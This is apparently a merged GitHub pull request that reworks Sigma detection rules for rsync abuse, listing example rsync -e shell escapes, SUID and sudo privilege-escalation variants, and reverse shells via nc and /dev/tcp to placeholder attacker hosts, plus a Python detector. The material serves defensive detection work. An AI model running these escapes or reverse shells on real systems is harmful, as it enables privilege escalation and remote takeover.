
Rsync exploitation #5163

Merged
merged 9 commits into from
Jan 19, 2025
Conversation

Neo23x0
Collaborator

@Neo23x0 Neo23x0 commented Jan 18, 2025

Summary of the Pull Request

I reworked the rule for suspicious rsync invocations and added a new one that is supposed to detect rsync exploitations in a generic way (e.g. CVE-2024-12084 https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/ ). Since it's more a generic rule than a specific detection for an exploitation of CVE-2024-12084 I decided to not add it to the emerging-threats rule set but add it to the standard set.

The old rule for suspicious rsync invocations with the -e flag had a wrong description and far too specific strings in the selection. I wonder if this ever matched anywhere. I composed a list of examples so that everyone can understand why the previous values were too specific and to show the variety of ways in which such a command could be written.

Changelog

new: suspicious shell invocation via rsync without the -e flag
update: made the far too narrow existing rsync rule more generic

Example Log Event

Examples for rsync invocations

```shell
# Basic Shell Escapes
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/bash -i' 127.0.0.1:/dev/null
rsync -e 'dash -c "dash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/dash -i' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/zsh -i' 127.0.0.1:/dev/null
rsync -e 'ksh -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/ksh -i' 127.0.0.1:/dev/null
rsync -e 'busybox sh' 127.0.0.1:/dev/null
rsync -e 'busybox ash' 127.0.0.1:/dev/null
rsync -e 'fish -c "fish 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/usr/bin/fish -i' 127.0.0.1:/dev/null

# Abusing SUID with Different Shells
./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'bash -p -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'zsh -p -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'ksh -p -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Abusing Sudo Permissions
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'sh -c "/bin/sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Using Netcat for Reverse Shells
rsync -e 'sh -c "nc -e /bin/sh attacker-ip attacker-port"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null
```

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions
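The PR argues that fixed substrings in the old rule's selection missed most of the ways the `-e` argument can be written. The following is an added example (not the SigmaHQ rule from this PR and not the author's code) of the same detection idea done by tokenising the process command line instead of substring matching: it pulls out the `-e` / `--rsh` value, skips transparent prefixes such as `sudo` and `busybox`, and flags the event when the first program in that value is a shell interpreter rather than a transport like `ssh`. The `SAMPLE_EVENTS` list, the host names and the benign backup command lines are constructed for this example; the malicious command lines are taken from the list above.

```python
"""Parser-based check for rsync -e / --rsh shell escapes (added example)."""
import os
import shlex

# Interpreters that, as the first program of the -e argument, mean rsync is
# being used to spawn a local shell rather than a remote transport like ssh.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash", "fish", "csh", "tcsh"}
# Prefixes that are transparent for this check ('sudo rsync', 'busybox sh').
WRAPPERS = {"sudo", "busybox"}


def _program(tokens):
    """Return the basename of the first real program in an argv list.

    Wrapper names and option-like tokens are skipped. A sudo option that takes
    a value ('sudo -u root rsync') is not handled and would be misread; that is
    an accepted simplification of this example.
    """
    for tok in tokens:
        name = os.path.basename(tok)
        if name in WRAPPERS or tok.startswith("-"):
            continue
        return name
    return None


def extract_rsh(cmdline):
    """Return the -e/--rsh value of an rsync command line, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: not a well-formed command line
        return None
    rsync_at = next((i for i, t in enumerate(argv)
                     if os.path.basename(t) == "rsync"), None)
    if rsync_at is None:
        return None
    args = argv[rsync_at + 1:]
    for i, tok in enumerate(args):
        if tok in ("-e", "--rsh"):  # '-e VALUE' / '--rsh VALUE'
            return args[i + 1] if i + 1 < len(args) else None
        if tok.startswith("--rsh="):  # '--rsh=VALUE'
            return tok[len("--rsh="):]
        if tok.startswith("-e") and not tok.startswith("--"):  # '-eVALUE'
            return tok[2:]
    return None


def detect(cmdline):
    """Return the shell name when the rsync remote-shell argument is a local
    shell interpreter, otherwise None (benign transports such as ssh)."""
    rsh = extract_rsh(cmdline)
    if not rsh:
        return None
    try:
        prog = _program(shlex.split(rsh))
    except ValueError:
        return None
    return prog if prog in SHELLS else None


# Constructed process-creation events: four of the PR's examples plus benign
# rsync usage (host names and backup paths are made up for this example).
SAMPLE_EVENTS = [
    {"host": "web01", "cmdline": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"},
    {"host": "web01", "cmdline": "./rsync -e 'bash -p -c \"bash 0<&2 1>&2\"' 127.0.0.1:/dev/null"},
    {"host": "db02", "cmdline": "sudo rsync -e 'zsh -c \"zsh 0<&2 1>&2\"' 127.0.0.1:/dev/null"},
    {"host": "db02", "cmdline": "rsync -e 'busybox ash' 127.0.0.1:/dev/null"},
    {"host": "bkp01", "cmdline": "rsync -avz -e ssh /srv/data/ backup.example:/srv/data/"},
    {"host": "bkp01", "cmdline": "rsync -e 'ssh -p 2222 -i /root/.ssh/bkp' /etc/ backup.example:/etc-bkp/"},
    {"host": "bkp01", "cmdline": "rsync -av /srv/data/ /mnt/snapshot/"},
]


def scan(events):
    """Return (host, shell, cmdline) for every event that looks like a shell escape."""
    hits = []
    for event in events:
        shell = detect(event["cmdline"])
        if shell:
            hits.append((event["host"], shell, event["cmdline"]))
    return hits


if __name__ == "__main__":
    for host, shell, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}: rsync spawned {shell!r} via -e: {cmd}")
```

Running the module prints the four escape events and stays silent on the three backup jobs, which is the property the PR asks of the reworked rule: match on the structure of the invocation (rsync, then `-e`, then a shell) rather than on one exact spelling. Sigma itself only offers substring and regex matching on the command-line field, so a rule cannot tokenise like this; the example is useful as a triage step after a broad rule fires, or as a generator of test cases for the rule's own `contains` values.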

@github-actions github-actions bot added Rules Linux Pull request add/update linux related rules labels Jan 18, 2025
@nasbench nasbench merged commit 06a5d08 into master Jan 19, 2025
23 checks passed